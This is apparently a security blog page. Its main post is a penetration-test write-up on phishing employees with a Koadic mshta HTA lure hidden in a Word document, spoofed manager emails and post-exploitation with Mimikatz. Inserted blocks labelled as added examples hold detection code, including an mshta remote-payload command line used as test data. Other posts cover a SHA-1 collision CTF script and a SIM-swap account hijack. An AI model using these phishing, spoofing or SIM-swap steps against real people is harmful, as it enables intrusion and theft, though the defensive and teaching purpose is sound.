There is a shell in your lunch-box

| Posted in Security Articles |


My team was recently engaged by a client (Hackme) to perform a black-box external penetration test. The objective was simple: see how susceptible the organization is from an external point of view and test the effectiveness of the security controls managed enterprise-wide. As such, aside from the company name, we were given "ZERO" information.



The following details illustrate how we embarked upon this assessment, which resulted in…
Well, read on…


We kicked off with some OSINT 101 :). There are quite a number of open source intelligence tools to assist in gathering emails, subdomains, hosts, employee names, etc. from different public sources such as search engines and Shodan. There is an exhaustive list of such tools here.

Using quite a few open source intelligence tools, we obtained publicly available documents relating to the organization. With Google dorks to the rescue, we ran some basic search strings: “site:* ext:xls OR ext:docx OR ext:pptx”. Of course, our aim was not to tirelessly search for documents; rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents we found (most especially Microsoft Word, PowerPoint and Excel). One can also use FOCA for this.

For this assessment, using theHarvester, I noticed that employee emails followed a particular naming convention: the first letter of the first name followed by the surname, @ the company domain.

Armed with this knowledge, we extracted from LinkedIn the list of all current employees of Hackme using the following Google dork syntax: -inurl:dir "at Hackme" "Current". A typical example is shown above, using Google Inc as a reference company.


By hacking together a script to automate the process, we copied out the first names, last names and roles of the current employees of Hackme. A tiring alternative is to manually crawl through the Google result pages in search of these names and roles; one could also use GoogleScraper:

GoogleScraper -m http --keyword " -inurl:dir 'at Hackme' 'Current'" --num-pages-for-keyword 3 --output-filename output.json

…and then the results:

Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using any converter that works for you.

…and then, using your favorite word processor (Word merge, Notepad++, etc.) or some good script-fu skills, merge first name + last name to form your email list.

Now it’s time to feed our target list a payload…


Since we are simulating a black-box external attack, we decided (just like an attacker would) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via email to employees of Hackme. We also know that it is common practice for some file types/extensions to be blocked by an organization’s email filters, to limit exposure to risk.


This then brings us to Koadic C3 COM Command & Control, a very decent framework, just like your Meterpreter or Empire. What made it really stand out, aside from the beautiful interface, is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan the local network for open SMB, pivot to another machine, load Mimikatz and a lot more.

So we ran Koadic and set the necessary variables, using the stager/js/mshta module (which serves payloads in memory using MSHTA.exe HTML Applications).

The result was our HTA payload URL. However, we need our targets to execute our payload via mshta. In recent years, HTA payloads have been used as a web attack vector and also to drop malware on a victim’s PC. Now we need to get this payload past our victim’s numerous defenses.

Here comes the tricky part: we needed a way to have the victim run mshta without our payload being spawned as a child process of mshta.exe, as we suspected this organization’s blue team might flag this.

Thankfully, we saw the tip below from Matt Nelson,

and interestingly, the team at NCC Group have this implemented in Demiguise. So here is our final payload, saved as a .hta file.

The next step, typically, is to send our .hta payload as an embedded OLE object.

The intended attack scenario was:

  1. Send a Microsoft word document with our .hta payload embedded as an OLE object.
  2. Get the user to open the word document and the embedded OLE object.
  3. This spawns a new process and we get a shell access into our victim’s PC.
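Seen from the blue team's side, the chain just described (an OLE-embedded .hta launched from a Word document, and mshta.exe pulling its payload from a URL) leaves a recognisable parent/child trace in process-creation telemetry. The following is an added example, not code from the original post: the field names mirror Sysmon Event ID 1, the rule names are mine, and the log lines are constructed.

```python
import json
import re
from dataclasses import dataclass

# Detection logic for the HTA delivery chain described above: an OLE-embedded
# .hta launched from an Office document, and mshta.exe pulling a payload over
# the network (Koadic's stager/js/mshta serves it from a URL).  Added example,
# not from the original post; field names mirror Sysmon Event ID 1 and the
# sample log lines further down are constructed.

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# URL or UNC path on the mshta command line: the HTA is not a local file.
REMOTE_SOURCE = re.compile(r"https?://|\\\\[^\\\s]+\\", re.IGNORECASE)


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows- or POSIX-style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Names of the rules this event trips; an empty list means nothing fired."""
    hits = []
    child, parent = basename(ev.image), basename(ev.parent_image)
    if parent in OFFICE_APPS and child == "mshta.exe":
        hits.append("office-spawned-mshta")          # embedded OLE package opened
    if child == "mshta.exe" and REMOTE_SOURCE.search(ev.command_line):
        hits.append("mshta-remote-payload")          # stager fetched over HTTP/UNC
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS - {"mshta.exe"}:
        hits.append("office-spawned-script-host")    # same chain via another LOLBin
    return hits


def parse_event(line: str) -> ProcEvent:
    """One JSON-encoded process-creation event (Sysmon-style field names)."""
    d = json.loads(line)
    return ProcEvent(d["Image"], d["ParentImage"], d["CommandLine"])


def scan(lines) -> list:
    """(image basename, rule hits) for every event that tripped at least one rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        hits = classify(ev)
        if hits:
            findings.append((basename(ev.image), hits))
    return findings


# Constructed sample telemetry: one opened lure, two benign events.
SAMPLE_LOG = [
    '{"Image": "C:\\\\Windows\\\\System32\\\\mshta.exe", '
    '"ParentImage": "C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE", '
    '"CommandLine": "mshta.exe http://203.0.113.10:9999/lunchmenu"}',
    '{"Image": "C:\\\\Windows\\\\System32\\\\mshta.exe", '
    '"ParentImage": "C:\\\\Windows\\\\explorer.exe", '
    '"CommandLine": "mshta.exe C:\\\\Tools\\\\help.hta"}',
    '{"Image": "C:\\\\Windows\\\\splwow64.exe", '
    '"ParentImage": "C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE", '
    '"CommandLine": "splwow64.exe"}',
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_LOG):
        print(image, "->", ", ".join(hits))
```

Only the first constructed event fires (Office parent plus a remote payload URL); a local .hta opened from Explorer and Word's print helper pass through unflagged.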

Now we get to the interesting part: we need our victim to open the Microsoft Word document and our payload.

To do this, we need a very compelling story, because users are getting smarter. So we headed back to doing more recon.

…and more recon

We need to know more about Hackme, specifically the culture and employee behaviour. The question we kept asking ourselves was: “What would interest the employees?”

Where else to get this information than Glassdoor, a platform that gives you the inside scoop on companies through employee reviews about salaries, benefits, and the pros and cons of working for the company.

After poring through reviews of Hackme on Glassdoor, we found some common themes:

1. Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.

2. Employees love the organization because they get free lunch.

But Wait!

Like the old saying goes, the fastest way to a man's heart is through his stomach. So what better way to get the employees to open our payload-embedded Word document? Send them an email telling them there is a change in the FREE LUNCH menu starting from tomorrow.

Rather than sending a random phishing email to employees that could easily be spotted, we decided a seemingly genuine email would be ideal, complete with a Hackme email signature and observing the organization’s email culture. Now, how do we make our email more believable? By sending an email to Customer Service/Help Desk with a service request and observing the email signature in the response.

… recon again??????

We headed back to LinkedIn to look for the name of either the HR Manager, Logistics Manager or Admin Manager (whichever was appropriate) of Hackme. We carefully crafted an email signature with the name we selected.

We are halfway to sending our payload now. Have some patience and read on…

…time to send our payload

From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like. I then created a new Word document like the one shown below, a spitting image of the Hackme document template with appropriate headers/footers.

…and then we embedded our .hta as an OLE object: Microsoft Word >> Insert >> Object >> Package. We changed the icon to Microsoft Word’s icon and the caption to reflect our message.

Don’t forget the antivirus!!!

In order to check the detection rate of our payload, and to see whether it would be flagged as malicious by Hackme's antivirus solution (if any), we did a quick AV scan. The scanning service was chosen because, according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file.


It’s time to make it rain… er, send our email

If the target org does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager's, Logistics Manager's or Admin Manager’s email address. In this case, I created a Gmail account (yes, Gmail works too) using the Logistics Manager's first name and last name, and then spiced it up with his signature, which was obtained earlier.
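The two delivery options above fail in different ways for a defender: an exact-domain spoof can be refused only if the organization's own SPF/DMARC records allow receivers to do so, whereas a free-mail account carrying a manager's name passes every authentication check and has to be caught on the name itself. The triage below is an added example (not from the original post); the domain hackme.example, the staff names, the DNS records and the From: headers are all constructed.

```python
import re

# Inbound-mail triage for the two lures discussed above: an exact-domain spoof
# of a manager's address (only feasible when the domain publishes no enforcing
# SPF/DMARC) and a free-mail account carrying the manager's name, which
# SPF/DKIM/DMARC never see.  Added example, not from the original post; the
# domain, staff list, DNS records and headers below are constructed.

ORG_DOMAIN = "hackme.example"
STAFF = {"ada okafor", "emeka obi"}        # constructed directory of manager names
FREE_MAIL = {"gmail.com", "yahoo.com", "outlook.com", "hotmail.com"}


def dmarc_enforcing(txt):
    """True when a DMARC TXT record applies quarantine/reject to all mail (pct=100)."""
    if not txt or not txt.strip().lower().startswith("v=dmarc1"):
        return False
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip().lower()
    return tags.get("p") in {"quarantine", "reject"} and tags.get("pct", "100") == "100"


def spf_hard_fails(txt):
    """True when an SPF record ends in -all, so unlisted senders hard-fail."""
    if not txt or not txt.strip().lower().startswith("v=spf1"):
        return False
    return txt.split()[-1].lower() == "-all"


def parse_from(header):
    """'Display Name <user@domain>' -> (display name, local part, domain), lower-cased."""
    m = re.match(r'\s*"?([^"<]*?)"?\s*<?([^<>@\s]+)@([^<>\s]+)>?\s*$', header)
    if not m:
        return None
    name, local, domain = m.groups()
    return name.strip().lower(), local.lower(), domain.lower()


def names_match(display, local, staff_name):
    """Display name, or a local part such as emeka.obi / emekaobi, equals a staff name."""
    squashed = re.sub(r"[._-]", "", local)
    return display == staff_name or squashed == staff_name.replace(" ", "")


def triage(from_header, dmarc_txt, spf_txt):
    """Findings for one From: header, given the org's own DMARC and SPF records."""
    parsed = parse_from(from_header)
    if parsed is None:
        return ["unparseable-from"]
    display, local, domain = parsed
    findings = []
    if domain == ORG_DOMAIN:
        # Exact-domain spoof: receivers can only refuse it if DNS lets them.
        if not dmarc_enforcing(dmarc_txt) and not spf_hard_fails(spf_txt):
            findings.append("exact-domain-spoofable")
        elif not dmarc_enforcing(dmarc_txt):
            findings.append("spf-only-no-dmarc-enforcement")
    else:
        if any(names_match(display, local, s) for s in STAFF):
            kind = "free-mail" if domain in FREE_MAIL else "external"
            findings.append(f"staff-name-on-{kind}-address")   # the Gmail trick
        if ORG_DOMAIN.split(".")[0] in domain:
            findings.append("lookalike-domain")
    return findings


# Constructed records for the organisation's own domain.
WEAK_SPF, WEAK_DMARC = "v=spf1 include:_spf.mail.example ~all", None
STRONG_SPF, STRONG_DMARC = ("v=spf1 include:_spf.mail.example -all",
                            "v=DMARC1; p=reject; rua=mailto:dmarc@hackme.example")

if __name__ == "__main__":
    for hdr in ("Emeka Obi <emeka.obi@gmail.com>", "Emeka Obi <eobi@hackme.example>"):
        print(hdr, "->", triage(hdr, WEAK_DMARC, WEAK_SPF))
```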

Let the shells in

Shortly after sending the email, within about 3 minutes, we had at least 30 shell connections! W00t!!!


What next?

The rest, as they say, is history. From here on, using the Mimikatz modules, we escalated privileges, dumped hashes, scanned Hackme's local network, pivoted into other PCs, browsed the target’s file systems and even became domain admins.

In conclusion

All in all, this was a very fun engagement. Whilst it might take an attacker a month, two months or a year of dedication to break into an organization through a loophole at the infrastructure level, it can be fairly easy to gain access by exploiting the human factor.

“Once you understand your target environment, devising a creative means of gaining access to the environment becomes fairly easy.”

The moral of the exercise is: recon, recon and more recon, for a wise man once said, “Give me six hours to chop down a tree and I will spend the first four sharpening the axe.”


– Rotimi Akinyele


Using the SHA1 collision attack to solve the BostonKeyParty CTF challenge

This is a writeup for the Boston Key Party CTF 2017 Prudential challenge, which I took part in over the weekend.

I viewed the source of the webpage and found that an index.txt file was being referenced.

Snippets below:

<?php
require 'flag.php';
if (isset($_GET['name']) and isset($_GET['password'])) {
    $name = (string)$_GET['name'];
    $password = (string)$_GET['password'];
    if ($name == $password) {
        print 'Your password can not be your name.';
    } else if (sha1($name) === sha1($password)) {
        // different inputs, identical SHA-1 digests: the flag is released
        die('Flag: '.$flag);
    } else {
        print '<p class="alert">Invalid password.</p>';
    }
}
?>


Two conditions need to be met here to display the flag:

  1. The $name entered must not be the same as the $password.
  2. sha1($name) must be the same as sha1($password).


My thought process at this point was to find different values for $name and $password with the same SHA-1 hash. What immediately comes to mind is the SHA-1 collision attack recently revealed by the Google team.

According to the Google team, “It is now practically possible to craft two colliding PDF files and obtain a SHA-1 digital signature on the first PDF file which can also be abused as a valid signature on the second PDF file.”

Two different PDF files with the same checksum are available here:

I then came up with a quick and dirty Python script to do the job. This script sends the first 500 bytes of the first PDF as the parameter “name” and the first 500 bytes of the second PDF as the parameter “password”.

import requests

# The two colliding PDFs and the challenge page were links in the original post.
rotimi = requests.get("").content[:500]    # first 500 bytes of colliding PDF 1
letmein = requests.get("").content[:500]   # first 500 bytes of colliding PDF 2

# Different byte strings, identical SHA-1 digests: both PHP conditions hold.
r = requests.get("", params={"name": rotimi, "password": letmein})
print(r.text)

After running this, I got the flag : FLAG{AfterThursdayWeHadToReduceThePointValue}
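Why the script can send only the first 500 bytes of each PDF and still collide follows from SHA-1's block structure: once the two files' differing blocks have been absorbed, their chaining states are identical, so any identical continuation, or any identical truncation point, yields the same digest. The pure-Python SHA-1 below is an added example, not the author's script; it exposes that chaining state so the property can be checked, and prudential_gate mirrors the PHP check above. The colliding PDFs themselves are not embedded; the inputs used are constructed.

```python
import hashlib
import struct

# Pure-Python SHA-1 that exposes the chaining state between 64-byte blocks.
# Added example, not the author's script: it shows why two colliding files keep
# colliding after both are cut to the same length (the script above sends only
# the first 500 bytes of each PDF).  Inputs are constructed; the real colliding
# PDFs are not embedded here.

MASK = 0xFFFFFFFF
IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def compress(state, block):
    """One SHA-1 compression step: (5-word state, 64-byte block) -> new state."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & MASK, a, _rotl(b, 30), c, d
    return tuple((s + t) & MASK for s, t in zip(state, (a, b, c, d, e)))


def state_after(data, state=IV):
    """Chaining state once every complete 64-byte block of data is absorbed."""
    for off in range(0, len(data) - len(data) % 64, 64):
        state = compress(state, data[off:off + 64])
    return state


def finish(state, consumed, tail):
    """Digest of a message whose first `consumed` bytes (a multiple of 64) led to
    `state`, followed by `tail`: SHA-1 needs only the state and the total length."""
    total = consumed + len(tail)
    padded = tail + b"\x80" + b"\x00" * ((55 - total) % 64) + struct.pack(">Q", total * 8)
    return "".join(f"{s:08x}" for s in state_after(padded, state))


def sha1_hex(data):
    return finish(IV, 0, data)


def same_digest_for_any_suffix(prefix_a, prefix_b):
    """True when two equal-length, block-aligned prefixes reach the same state.
    That is the situation right after the colliding PDFs' differing blocks: from
    then on every identical continuation, and every identical cut, collides."""
    assert len(prefix_a) == len(prefix_b) and len(prefix_a) % 64 == 0
    return state_after(prefix_a) == state_after(prefix_b)


def prudential_gate(name: bytes, password: bytes) -> str:
    """Mirror of the PHP check above: 'same', 'flag' or 'invalid'."""
    if name == password:
        return "same"
    if sha1_hex(name) == sha1_hex(password):
        return "flag"
    return "invalid"


def agrees_with_hashlib(data: bytes) -> bool:
    """Cross-check the hand-rolled SHA-1 against hashlib, resuming at a block edge."""
    cut = len(data) - len(data) % 64
    resumed = finish(state_after(data[:cut]), cut, data[cut:])
    return resumed == sha1_hex(data) == hashlib.sha1(data).hexdigest()
```

With the two real PDFs, same_digest_for_any_suffix on their first 320 bytes returns True, which is exactly why the script's 500-byte cut of each file still satisfies the second PHP condition while failing the first.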

CSAW CTF Quals 2016 Writeups

This weekend was a very busy one for me, as I had to participate in 2 CTF events, MITRE and CSAW Quals, with my team, NaijaSecForce. We placed 191st out of 1274 teams in the CSAW Quals. Below are the writeups for some of the challenges I solved.

Forensics – Kill

Is kill can fix? Sign the autopsy file?



We were given a .pcapng file. This was quite easy, as our old friend grep did the job.

ICECTF 2016 Writeups

I recently started participating in CTF events with my team, NaijaSecForce. However, due to time constraints, it has always been a struggle to come up with writeups on how we solved some of the challenges. Luckily, ICECTF 2016 was on for 2 weeks, so I was able to come up with writeups for some of the challenges I solved.

ICECTF is a Jeopardy-style CTF where you are given a question or task from which you are supposed to extract a flag. I participated with my team NaijaSecForce and we placed 188th out of 1696 teams (yaaay, we made the top 11% :-). So without further ado, let’s get to cracking.

Tips to staying safe online this festive season

The holiday season is upon us and, as always, we are all scrambling to get the best deals online and in stores. However, a few wrong clicks this season could land cybercriminals at the top of your list of people receiving presents this year.

This year has witnessed lots of significant breaches ranging from a $40m cyber-heist by a Nigerian bank IT worker to the huge data leakage at Sony, just about a week ago.

Information Security expert, Rotimi Akinyele of PhynxLabs said online users can easily put themselves and their devices at risk, unless they take precautions and avoid the common mistakes highlighted below that could compromise their security.


Beware of the Bank Verification Number (BVN) Scam

The ongoing Bank Verification Number (BVN) registration, introduced by the CBN as a means of uniquely identifying bank customers across the Nigerian banking industry, has provided fertile ground for cyber criminals to defraud unsuspecting bank customers.

Scam emails purportedly sent from banks/the CBN are in circulation, urging bank customers to visit a website to activate their BVN online, as failure to do so would supposedly result in their account(s) and debit cards being deactivated.

Please note that BVN registration can only be done physically at a bank’s branch. There is no technology now to replace the physical capture of your biometric data which the BVN seeks to achieve.

Do NOT access your accounts from public WiFi

Just because a WiFi network is free doesn’t mean you should connect to it whenever it’s available. When you’re banking or making other online payments, it’s better to connect via EDGE or 3G, even if it’s slower. It might only be 45 seconds of doing an online bank transaction, but if the wireless network has been compromised, that is more than enough time for a cyber-criminal to collect your data.

Use a secure password

It’s crucial to always use strong passwords, as passwords are the first line of defense against cyber crooks. Try not to use the names of your family, pets, first car, mother’s maiden name, etc., as all of these can be easily guessed, brute-forced or even found on social media sites like Facebook, Twitter or Instagram. Make sure to use a mixture of characters, numbers and letters, of at least 8 characters, when choosing your password, as only this adds a high level of difficulty to any attempted password theft. Also, do not reuse your passwords, as a compromise of one would translate to a compromise of all.

Stay safe on social networking sites

Social media sites are increasingly becoming targets for spam, scams and other online attacks. Aside from mining data from tons of “status updates” for targeted attacks, cyber criminals have mastered the art of baiting unsuspecting users with well-crafted, short but compelling posts offering free entry to a Christmas competition with a fantastic prize. The general rule is “there is no free lunch or freebies on the internet – if you’re not buying a product then you are the product”. Users who click the links then inadvertently act as accomplices to the cyber-criminals, because the malicious scripts automatically re-post the links, images or videos on their contacts’ walls or timelines. If an offer looks too good to be true, it probably is. Do NOT click.

Protect yourself from fraudulent emails

If you receive an email urging you to download an unknown tax payment attachment, or an email informing you of an urgent pending transaction for which you need to log in with your details to verify, DELETE that email. Such emails usually trick users into visiting a site, and once you do, viruses and spyware get downloaded onto your device, which automatically joins you to a network of enslaved computers programmed to carry out malicious deeds. No reputable organization would send emails to collect user names, passwords, token keys or debit/credit card details.


The threats to your online accounts increase daily; however, the tips above can help you stay protected online while still enjoying the convenience online access offers you this holiday.

Stay safe online and happy holiday!

Rotimi Akinyele is the Chief Security Evangelist at PhynxLabs where he leads the application and Network security competency.

How Airtel Security Flaw Led To Website Hacking

In the space of one hour, the entire webmaster board was overloaded with several threads titled “ got hacked”. On checking one of the threads, I hurriedly fired up my browser, checked the Naijaloaded site and, poof, I had a defaced webpage before me.

The next thing I did was to send Naijaloaded’s owner an email informing him of the hack, to which he replied this morning, saying: “They Swapped my SIM, Used the Forgot Password Features and Yahoo Sent the Guy my Code, he then Changed my Yahoo Password and Requested for a Password Changing Note from my Domain Registrar, Then he finally Changed my DNS”.

At first, I didn’t understand the swapping part. So I fired up my browser again and started crawling through webpages with the dork “Airtel Nigeria instant swap”.

After much crawling, I learnt that to swap your Airtel SIM (i.e. to hijack another person’s Airtel SIM), all you need is:

1. An Airtel swap SIM, which goes for just N300 and is offered for sale here
2. The four (4) most-dialled numbers
3. The serial number on the new Airtel swap SIM

…and in 20 mins max, the new SIM will be ready.

That easy yeah?!

After the “hacker” swapped Naijaloaded’s owner's SIM, he went on to use Yahoo’s Forgot Password feature; Yahoo then sent the hacker a code (to the swapped SIM), he changed the Yahoo password, after which the hacker requested a password changing note from the domain registrar and ended up changing the site's DNS.

A brilliant social engineering attack it was!

This clearly exposes vital security flaws in several customer service systems.

All a malicious person needs to know to hijack your SIM is your four most-dialled numbers (your dad, mom, girlfriend, line manager, direct subordinate, etc.).

You know what this means? You can directly intercept that scheduled business call by hijacking that Big Oga’s sim.

The guy that perpetrated this act not only digitally hacked the owner but socially hacked him too, as he could receive calls on his behalf.

It’s quite upsetting that the ecosystem in which we’ve placed so much of our trust (in this case Airtel) has let some of us down so thoroughly.

Social engineering, albeit a new one in the Nigerian space, is here to stay. Folks, are you ready?

NB: I originally posted this blogpost here. You can follow up the discussion there.

Working with People: An Introduction to Social Engineering

A reader sent me this great article on Social engineering, so I decided to share with you all. Enjoy 🙂

Humans are inherently social creatures who have developed a world strongly based on interacting with others. Just like the world of information technology, the human social protocols are a complex series of rules and guidelines for how people behave when interacting with each other, and just like any other system, there are methods to use and abuse it once you understand the rules that govern it. Social engineering is a broad subject, but in this article we will focus mostly on social engineering as it is used to gain access to social groups and sensitive information.

What Is Social Engineering?


Social engineering is using the common tendencies of how people interact with others in order to gain information or a benefit of some kind. Effectively, social engineering can be referred to as the hacking of people. Before the Internet age, social engineering would more likely be referred to as conning, but the scope of social engineering’s applications goes beyond tricking people out of money. It is about causing people to act according to your wishes. Getting someone to say yes to a date is social engineering. So is getting your company a contract from a tough client. In regards to information security, social engineering is getting people to give up protected information.

A social engineering definition can be found here.

How Effective Is Social Engineering?


Even companies that place a high focus on securing their information networks can prove extremely vulnerable to social engineering attacks. DefCon, one of the largest hacking conferences in the world, routinely features a social engineering competition that has demonstrated over and over again that simple tactics can be used to get enough information to potentially do harm to a company. Position in the company also seems to have almost no effect on how susceptible a person is to social engineering; a bigwig is just as likely to give up information as a cashier, but the bigwig also usually has access to more pertinent info.

Social engineering is gaining attention for its insidious effectiveness, and is starting to get recognized in the media and the corporate world. Check out these news articles for an idea of how it is being perceived:

Smooth-Talking Hackers Test Hi-Tech Titan’s Skills – A look at DefCon hacking competitions, utilizing social engineering within legal boundaries to ferret out intelligence designed to weaken a company’s security.

Social engineering to blame in Syrian Electronic Army hijack of the Onion – The targets of these sorts of attacks aren’t always the ones you might expect, the Onion was a recent victim of a phishing scheme.

Facebook Social Engineering Attack Strikes NATO – Often, the targets are important, such as this attack against NATO. Every organization contains a human element, the target of savvy social engineers.

How a lying ‘social engineer’ hacked Wal-Mart – Many people are naturally biased to trust based on a set of subtle criteria; a tone of voice, a style of dress, even word choices can lead people to give credence to otherwise nonsensical ideas or situations, like this Wal-Mart store manager being duped into giving away company data in exchange for a non-existent contract possibility.


General Tips for Social Engineering


These are common guidelines and methods used by social engineers before and during any assignment on which they are working. These focus more on the preparation and mindset of the social engineer than the actual attack methods that are used.

Do Your Research


Take a look at this seminar on social engineering strategies.

Information is everywhere. If there is a topic you want to know about, you usually only need to glance at the Internet. Reading the news and press releases from a company can give you a firm background history from which to work. A social media site may give you insights into the temperament of a person or give you an idea of the social scene in which they operate. If you are trying to infiltrate a group or become closer to a person with any notable focus, then the Internet can be used to familiarize yourself with the topic.

Hackers may go above and beyond in this regard. If they manage to gain access to someone’s email account or messaging service, there may be records of conversations that can be used to mimic the person in electronic communications or learn about key topics that anyone on the inside should know about.


Read full article here:


Have you ever chatted with a Hacker within a virus?

By Franklin Zhao & Jason Zhou

This is an impressive and first-time experience in my anti-virus career: I chatted with a hacker while debugging a virus. Yes, it’s true. It happened when the Threat team was researching key loggers for Diablo III, while many players of this game were finding their accounts stolen. A sample was found on battle.net in Taiwan, China. The hacker posted a topic titled “How to farm Izual in Inferno” (Izual is a boss in Diablo III Act 4) and provided a link in the content which, as he said, pointed to a video demonstrating the method.


Below is the ‘Video’. It’s actually a RAR archive containing two executable files. These two files are almost the same except for the icon.


The malware will connect to a remote server via TCP port 80 and download a new file packed by Themida.


That’s very simple downloader/backdoor behavior, and we were only interested in looking for key-logging code for Diablo III, so we didn’t pay much attention to it.

But then an astonishing scene unfolded. A chat dialog popped up with a text message:

(Translated from the image below)

Hacker: What are you doing? Why are you researching my Trojan?

Hacker: What do you want from it?


The dialog is not from any software installed in our virtual machine. On the contrary, it’s an integrated function of the backdoor, and the message was sent by the hacker who wrote the Trojan. Amazing, isn’t it? It seems that the hacker was online and realized that we were debugging his baby.


We were intrigued and continued to chat with him. He was really arrogant.

(Translated from the image below)

Chicken: I didn’t know you can see my screen.

Hacker: I would like to see your face, but what a pity you don’t have a camera.


He was telling the truth. This backdoor has powerful functions, like monitoring the victim’s screen, controlling the mouse, viewing processes and modules, and even controlling the camera.


We then chatted with the hacker for some time, pretending that we were novices who would like to buy a Trojan from him. But this hacker was not foolish enough to tell us the whole truth. He then shut down our system remotely.

Regarding this malware, no Diablo III key-logging code was captured. What it really wants to steal is the dial-up connection’s username and password.


It sounds like a movie story, but it’s real. We are familiar with malware and we fight it every day. But chatting with malware writers in real time doesn’t happen so often. Next time, I will be on the alert.

The malware and its components are detected by AVG as Trojan horse BackDoor.Generic variants.


Franklin Zhao & Jason Zhou




Tarot Reading! Who is calling?

Guest Post By Nurudeen Odeshina

Recently, I received a call from an unknown number. The caller hung up the moment I said “Hello”. This was of course against my usual habit of letting unknown callers speak first so that I may know who is at the other end of the phone. Anyway, I looked the number up online and B.I.N.G.O! I got not only the name of my unknown caller but the location too!

There is a whole lot of (personal) information we post online, most especially on social media sites. Though the intent may be to share personal information with friends and family, most of this information is also accessible to online crooks and criminals. People post names, addresses, geo-tagged photos and all sorts. What more information does a criminal need to rob you? Social media makes it more fun. You can tell people’s date of birth, family members, employers, favourite hang-out spots, events they are attending and lots more. What more information does a tarot reader need that cannot be sourced from your online presence? Your relationship status, e.g. divorced, engaged, married to? A tarot reader needs no crystal ball anymore. All they need is a computer connected to the internet.


Think twice before you post personal information. Remember, criminals and crooks have an online presence too and may see what you post on the internet.


Nurudeen Odeshina is an Information Value Chain Consultant (Information Security & Information Assurance), COBIT Trainer/Consultant. Passionate about #Information Security #ISO27001 #ISO22301 #PCIDSS

Follow him on twitter @Ibn_AbdulRahman

Online Penetration Testing Tools

I saw this post on eLearnSecurity and decided to share. I will be updating as time goes on.

Information gathering:
(IP lookup, BGP AS lookup)
(ASN search)
(DNS, whois, network lookup, …)

Exploit search:
(Google engine)

Scanning networks, web structures, ..
(nmap, openvas, sqlix, sqlmap, nikto, sub_domain) http://hackertarget….
(Drupal Vulnerability Scanner)
(Joomla scanner)
(Cross Site Scripting Scanner)
(SQLi) http://www.be007.gig…
(SQLi) http://www.localvn.b…

Hack tools store:

XSS Guide:…

SQL Injection Guide

netcat cheat sheet:…
hping3 cheat sheet:…
Metasploit meterpreter:…

Browser test:

Shellcode to exe:………

(SHA1/MD5 hash cracker on ATI and NVIDIA GPUs)
(Default Password List) http://www.phenoelit…

Malware analysis:
(analysis system) http://mwanalysis.or…
(behavior analysis)
(behavior analysis) http://mwanalysis.or…

Google Pentest Bookmarks List:….